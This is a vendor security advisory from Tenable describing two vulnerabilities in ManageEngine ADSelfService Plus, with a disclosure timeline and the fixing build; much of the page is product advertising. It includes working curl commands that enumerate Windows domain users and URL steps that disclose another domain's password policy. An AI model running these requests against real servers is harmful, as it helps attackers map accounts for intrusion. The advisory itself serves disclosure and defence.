Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

ManageEngine SelfService Plus Multiple Vulnerabilities

Medium

Synopsis

While researching CVE-2021-28958, Tenable found multiple vulnerabilities in ManageEngine ADSelfService Plus (ADSSP) build 6111.

1) Windows Domain User Existence Determination (CVE-2021-20147)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

ManageEngine ADSelfService Plus (ADSSP) allows an unauthenticated remote attacker to determine whether a Windows domain user exists. The attacker can achieve this with the following steps:

# Get configured domain list
curl 'http://<adssp-host>:8888/RestAPI/AuthenticationAPI?operation=domainList'

# Response when a domain user exists
# oldPassword and newPassword parameters need to pass the domain password policy 
curl -s -D - -o /dev/null -d 'oldPassword=Pw1@PwPolicy&newPassword=Pw2@PwPolicy&operation=UMCP&umcp=1&loginName=user1&domainName=<domain>' http://<adssp-host>:8888/RestAPI/ChangePasswordAPI | grep HTTP
HTTP/1.1 200 OK

# Response when a domain user does not exist
# oldPassword and newPassword parameters need to pass the domain password policy 
curl -s -D - -o /dev/null -d 'oldPassword=Pw1@PwPolicy&newPassword=Pw2@PwPolicy&operation=UMCP&umcp=1&loginName=no_such_user&domainName=<domain>' http://<adssp-host>:8888/RestAPI/ChangePasswordAPI | grep HTTP
HTTP/1.1 500 Internal Server Error

2) Windows Domain Password Policy Disclosure (CVE-2021-20148)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

When ADSSP is configured with multiple Windows domains, a user from one domain can obtain the password policy for another domain with the following steps:

- Login to http://<adssp>:8888/ with the credentials of a user in domain A
- Fetch http://<adssp>:8888/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PSS_OPERATION=aaa ; this should return a list of configured domains
- Fetch http://<adssp>:8888/html/<domain_B_in_uppercase>_PasswordPolicy.html, replacing dot with underscore in the domain name; For example, if domain B is foo.local, fetch FOO_LOCAL_PasswordPolicy.html

Solution

Update to ManageEngine ADSelfService Plus build 6116.

Disclosure Timeline

08/12/2021 - Vulnerabilities Discovered
9/14/2021 - Tenable reported vulnerabilities to vendor
9/14/2021 - Vendor requested we use the latest ADSSP version (6114) and noted they will investigate the same
9/22/2021 - Tenable reported to vendor that the vulnerabilities still exist in latest ADSSP version (6114) and requested update on their investigation
9/22/2021 - Vendor responded that they are still investigating
11/30/2021 - Tenable requested update on investigation and ETA for patch, reminded vendor of 90-day disclosure date
11/30/2021 - Vendor responded that the bugs have been fixed and they'll update us once patches are released
12/23/2021 - Tenable requested confirmation of patch release
12/23/2021 - Tenable released advisory

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2021-52
CVSSv3 Base / Temporal Score:
5.3 / 4.9
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C
Affected Products:
ManageEngine ADSelfService Plus < build 6116
Risk Factor:
Medium

Advisory Timeline

12/23/2021 - Advisory released
12/28/2021 - Updated solution with fixed version and updated temporal vector/score

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training